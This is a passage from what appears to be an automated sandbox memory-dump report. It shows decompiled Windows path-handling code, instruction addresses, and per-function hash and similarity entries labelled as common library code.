						_t161 = E0182F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01816E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01814620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01816E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M018145F8))) {
												case 0:
													_v568 = 0x17d1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17d11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01814620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0183F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0183F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017F52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0180EB70(1, 0x18e79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0180AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E018395D0();
																			L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0183B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01833D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0183B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01814128
0x01814135
0x0181413c
0x01814141
0x01814145
0x01814147
0x0181414e
0x01814151
0x01814159
0x0181415c
0x01814160
0x01814164
0x01814168
0x0181416c
0x0181417f
0x01814181
0x0181446a
0x0181446a
0x0181418c
0x01814195
0x01814199
0x01814432
0x01814439
0x0181443d
0x01814442
0x01814447
0x00000000
0x0181419f
0x018141a3
0x018141b1
0x018141b9
0x018141bd
0x018145db
0x018145db
0x00000000
0x018141c3
0x018141c3
0x018141ce
0x018141d4
0x0185e138
0x0185e13e
0x0185e169
0x0185e16d
0x0185e19e
0x0185e16f
0x0185e16f
0x0185e175
0x0185e179
0x0185e18f
0x0185e193
0x00000000
0x0185e199
0x00000000
0x0185e199
0x0185e193
0x00000000
0x00000000
0x00000000
0x018141da
0x018141da
0x018141df
0x018141e4
0x018141ec
0x01814203
0x01814207
0x0185e1fd
0x01814222
0x01814226
0x0185e1f3
0x0185e1f3
0x0181422c
0x0181422c
0x01814233
0x0185e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01814239
0x01814239
0x01814239
0x01814239
0x01814233
0x01814226
0x018141ee
0x018141ee
0x018141f4
0x01814575
0x0185e1b1
0x0185e1b1
0x00000000
0x0181457b
0x0181457b
0x01814582
0x0185e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01814588
0x01814588
0x0181458c
0x0185e1c4
0x0185e1c4
0x00000000
0x01814592
0x01814592
0x01814599
0x0185e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0181459f
0x0181459f
0x018145a3
0x0185e1d7
0x0185e1e4
0x00000000
0x018145a9
0x018145a9
0x018145b0
0x0185e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x018145b6
0x018145b6
0x018145b6
0x00000000
0x018145b6
0x018145b0
0x018145a3
0x01814599
0x0181458c
0x01814582
0x00000000
0x00000000
0x00000000
0x00000000
0x018141f4
0x0181423e
0x01814241
0x018145c0
0x018145c4
0x00000000
0x018145ca
0x018145ca
0x00000000
0x0185e207
0x0185e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x018145d1
0x00000000
0x00000000
0x018145ca
0x00000000
0x01814247
0x01814247
0x01814247
0x01814249
0x01814249
0x01814249
0x01814251
0x01814251
0x01814257
0x0181425f
0x0181426e
0x01814270
0x0181427a
0x0185e219
0x0185e219
0x01814280
0x01814282
0x01814456
0x018145ea
0x00000000
0x018145f0
0x0185e223
0x00000000
0x0185e223
0x0181445c
0x0181445c
0x00000000
0x0181445c
0x00000000
0x01814288
0x0181428c
0x0185e298
0x01814292
0x01814292
0x0181429e
0x018142a3
0x018142a7
0x018142ac
0x0185e22d
0x018142b2
0x018142b2
0x018142b9
0x018142bc
0x018142c2
0x018142ca
0x018142cd
0x018142cd
0x018142d4
0x0181433f
0x0181433f
0x018142d6
0x018142d6
0x018142d9
0x018142dd
0x018142eb
0x0185e23a
0x018142f1
0x01814305
0x0181430d
0x01814315
0x01814318
0x0181431f
0x01814322
0x0181432e
0x0181433b
0x0181433b
0x00000000
0x0181432e
0x018142eb
0x0181434c
0x0181434e
0x01814352
0x01814359
0x0181435e
0x01814361
0x0181436e
0x0181438a
0x0181438e
0x01814396
0x0181439e
0x018143a1
0x018143ad
0x018143bb
0x018143bb
0x018143ad
0x0181436e
0x018143bf
0x018143c5
0x01814463
0x01814463
0x018143ce
0x018143d5
0x018143d9
0x018143df
0x01814475
0x01814479
0x01814491
0x01814491
0x01814479
0x018143e5
0x018143eb
0x018143f4
0x018143f6
0x018143f9
0x018143fc
0x018143ff
0x018144e8
0x018144ed
0x018144f3
0x0185e247
0x00000000
0x018144f9
0x01814504
0x01814508
0x0181450f
0x0185e269
0x00000000
0x01814515
0x01814519
0x01814531
0x01814534
0x01814537
0x0181453e
0x01814541
0x0181454a
0x0185e255
0x0185e255
0x0185e25b
0x0185e25e
0x0185e261
0x0185e261
0x01814555
0x01814559
0x0181455d
0x0185e26d
0x0185e270
0x0185e274
0x0185e27a
0x0185e27d
0x0185e28e
0x0185e28e
0x01814563
0x01814563
0x01814569
0x01814569
0x00000000
0x0181455d
0x0181450f
0x00000000
0x018144f3
0x018143ff
0x01814405
0x01814405
0x01814405
0x018142ac
0x0181428c
0x01814282
0x01814407
0x0181440d
0x0185e2af
0x0185e2af
0x01814413
0x01814413
0x00000000
0x018141d4
0x00000000
0x018141c3
0x018141bd
0x01814415
0x01814415
0x01814416
0x01814417
0x01814429
0x0181416e
0x0181416e
0x01814175
0x01814498
0x0181449f
0x0185e12d
0x00000000
0x0185e133
0x00000000
0x0185e133
0x018144a5
0x018144a5
0x018144aa
0x00000000
0x018144bb
0x018144ca
0x018144d6
0x018144d7
0x018144d8
0x018144e3
0x018144e3
0x018144aa
0x0181417b
0x0181417b
0x0181417b
0x00000000
0x0181417b
0x01814175
0x00000000

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeed5ebf61f802e4348d38d98a914c6d7e0f3d0bb5724982a103dec6a905b967
Instruction ID: 1a59ea966c59ca4df000acad512571c868ccca221ed28109e516ca13c955d854
Opcode Fuzzy Hash: eeed5ebf61f802e4348d38d98a914c6d7e0f3d0bb5724982a103dec6a905b967
Instruction Fuzzy Hash: F4F1AF726087118FC724CF19C480A7ABBE5FF88754F14492EF986CB295E734DA81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0182513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe53ee3fe897fdf828861381c34d29b0466a9e154dd60494dc7a93cae8e6c52
Instruction ID: 96a44f708875798424f21e676a68a5fce18d5c9e9338b3a95584f12aa1e207a3
Opcode Fuzzy Hash: 4fe53ee3fe897fdf828861381c34d29b0466a9e154dd60494dc7a93cae8e6c52
Instruction Fuzzy Hash: FFC102755083818FD355CF28C580A5AFBE1BF89304F284A6EF9998B352D771EA85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 017FC600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0be521b3296b08b7ff1078473b9a507b6b39efe5f7adc12c384a91eed467688
Instruction ID: c9c99e77668a8c86498e1423a36d6f73a538b4bfe70d3c872f43f9008b7f6ee3
Opcode Fuzzy Hash: b0be521b3296b08b7ff1078473b9a507b6b39efe5f7adc12c384a91eed467688
Instruction Fuzzy Hash: 0B8180756042068BDB26CE58C880A7EB7EDEF8435CF18485AEE45DB241D730DE40CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0188B8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fed4ca5fb56c9e3d1459b0690d69de2bbf528290929cadf00d866bae11ec14d
Instruction ID: 28e926d06b4026d11ef2bfd8905edf3dc20d4f4f0211fc1a797c7957ee886c56
Opcode Fuzzy Hash: 2fed4ca5fb56c9e3d1459b0690d69de2bbf528290929cadf00d866bae11ec14d
Instruction Fuzzy Hash: 0071F232200706AFE732EF18CC44F66BBE5EF84724F144928E655D72A1EB71EA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017F52A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88630215df1f83384046942f3680ecca6730a2e3e9b4c2ef44c33600b6b02de1
Instruction ID: 611ac4f3a41d7be5035bb798b2344b4c942aec0a4823d061b95f51c499d02167
Opcode Fuzzy Hash: 88630215df1f83384046942f3680ecca6730a2e3e9b4c2ef44c33600b6b02de1
Instruction Fuzzy Hash: AD51CD71205746ABD322EF28C840B2BBBE4FF94710F14091EF995C7691E774EA40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0180EF40, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: c3d52e537e5b73f56254f0fb70af9eac12547e8334724155794c9391681edc43
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 3351F430A0424D9FEB66CB68C9907AEBBB1AF05318F18C1ACD645D73C2C375AA89C741

Uniqueness

Uniqueness Score: -1.00%

Function 018C740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 699039bad83780a21c6ee9fe198284c0cdd91401adcf33376c5f5a19bc4c2a6a
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 70518B71600646EFDB16CF18C480A96BBB9FF55704F14C1AAE908DF222E371EA46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01824D3B, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ab64a272e51e67e2b99d5865f34968b016845302f09c6131ed1e66deadd57f
Instruction ID: 53c3dbb5dd8d2957d05f73ecaea55679ae81ed0aa0c5171142c2301e49b3acda
Opcode Fuzzy Hash: 11ab64a272e51e67e2b99d5865f34968b016845302f09c6131ed1e66deadd57f
Instruction Fuzzy Hash: 2741B475A443689FEB32DF18CC80F66BBA9EB54714F040099E945DB281D774DF84CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01833D43, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9517d019b3abae9c2badc95e7e5fbbd3e4c7f0815d6f18c4953e73771bddffa
Instruction ID: a5feac3c6b03f6f106a538b037e6df7ea1aefb5422164960e12652b1dc05e4a9
Opcode Fuzzy Hash: a9517d019b3abae9c2badc95e7e5fbbd3e4c7f0815d6f18c4953e73771bddffa
Instruction Fuzzy Hash: B631AD35A00619DBD725CF2DC845A6ABBA5FF85710B09806AE94ACB750E734DA40C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0181C182, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 213b55e14ca17fa3107e587b1e22ff1f866c02ad32daae267493b201bfa7c55c
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 7131167264158BABD715EBB8C880BEAFB6DBF62304F04815AD51CC7245DB386B05C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 01877016, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1088190bcdb0c9da8fc15215ab693576752c52ee4af6a4a429d1dc872db898c
Instruction ID: 12921878462c9afcf138cb91a38f11761417c2a0d9ae7df129f841d4d387cbcb
Opcode Fuzzy Hash: e1088190bcdb0c9da8fc15215ab693576752c52ee4af6a4a429d1dc872db898c
Instruction Fuzzy Hash: 0631C4726047519BD321DF2CC844A6AB7E9BFC8700F044A2DF9A5C7690E730EA04CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0182E730, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c5689ac181a6c710b46980d387fb5070afe197a52df0f06e325436ac317797
Instruction ID: bda9c51146dafea1024983c3952be540ebfcba36f31069c34d2bfac67baf59d9
Opcode Fuzzy Hash: e8c5689ac181a6c710b46980d387fb5070afe197a52df0f06e325436ac317797
Instruction Fuzzy Hash: 4B317EB5A14249EFD745CF58D841F9ABBE8FB09314F148266FA08CB341D671EE80CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0182BC2C, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a531b6e44a77cd7fc7943d42b7d2db69b2d87f0a4a2abd1a71c1983475fdf3fd
Instruction ID: e090b00c74ee64860d90e8fd94340d8f1104b9bc1cc694995bffb86f5ab885aa
Opcode Fuzzy Hash: a531b6e44a77cd7fc7943d42b7d2db69b2d87f0a4a2abd1a71c1983475fdf3fd
Instruction Fuzzy Hash: D33101726016269BDB22DF58C4807A677B4FB29310F240479EE04EF206EB34DB858B81

Uniqueness

Uniqueness Score: -1.00%

Function 017F9100, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4593680cec03b7225f8ef95586296e22adfb3701b49d533eb5bf5b786f6541ae
Instruction ID: 1903b6ad3e78c3f68abbf4c565c5a4742d297928e611dea29c0ccb411bc52c02
Opcode Fuzzy Hash: 4593680cec03b7225f8ef95586296e22adfb3701b49d533eb5bf5b786f6541ae
Instruction Fuzzy Hash: BB31C575A05245DFEB26DB6CC488BAEFBF1BB49358F14816DE704A7351C334AA80CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018390AF, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: d4cd32760ab7216b8cb8696508b7775d71804755ec0c4c2453a54f4ae4cac636
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 71218671A00609EFDB21DF59C484E5AF7F8EB54314F18846AE949E7210D374EE40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 018C070D, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 16a632ed10e0e3971d70387638ee8a772f8c044fdf9c2f966d656446342e2fd9
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: FA21F53A2042049FD719DF1CC884AAABBA6EBD4750F04856DF995CB385DB30DA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0182FD9B, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b5ca18e75f06d81446d3ba327014d8157dc8611e9f76c33183ee1c2c2f3f7078
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: A2217976600A55DBD732CF0DC540E66BBF9EB94B10F24856EEA5ACB611D730AE80CB80

Uniqueness

Uniqueness Score: -1.00%

Function 017F9240, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8cc5b95015b0d2f105a4d31ffc7dc8f6a3f0f7dbb28b8623c76a7f8f5ca302aa
Instruction ID: a981074d091dcb920a7ac318e0f350fbbe9a1700ca9b5831f1860cfa68f74808
Opcode Fuzzy Hash: 8cc5b95015b0d2f105a4d31ffc7dc8f6a3f0f7dbb28b8623c76a7f8f5ca302aa
Instruction Fuzzy Hash: B8211432041605EFC722EF68CA40F5AB7F9EF28708F14456CE249CA6A2CA35EA41DB45

Uniqueness

Uniqueness Score: -1.00%

Function 018746A7, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 6964381a29606e5d11f17e1b305ecca39f2f85292e90f256ad549f5810e7fd4d
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 0511E572904208BBCB069F5CD8808BEBBB9EF95314F10806EF944C7351DA319E55D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0180766D, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 548e4a6b339f94f7cf58d8fc7c76894251ca8f0b90a7250b01769237e5f9dc92
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 7001D83370011DABD7629E5ECC44E5B7BADEB84760F140534BA59CF280DA31EE01C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 0188C450, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 4c8ce09d7f68bbe753a2fa43e2776418fb83391d4361a5600feb945ffc932950
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 4B01927214050ABFE721AF6DCC80EA2FB6DFFA4394F044525F214925A4CB61ADE0CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 017F9080, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9cfd3d3cfa958fd140afc61e451a8c55ffaa622bf3d8ebbd097c0aa913c547
Instruction ID: 3092a68e1f0ffc6a8d3618d445040dfca4cc89c5bc6955fa4b7f77bbe5db3448
Opcode Fuzzy Hash: ca9cfd3d3cfa958fd140afc61e451a8c55ffaa622bf3d8ebbd097c0aa913c547
Instruction Fuzzy Hash: 7601AF726016068FD3269F18D840B16BBE9EB86328F25406AF705CF796C774DD41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 018C4015, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
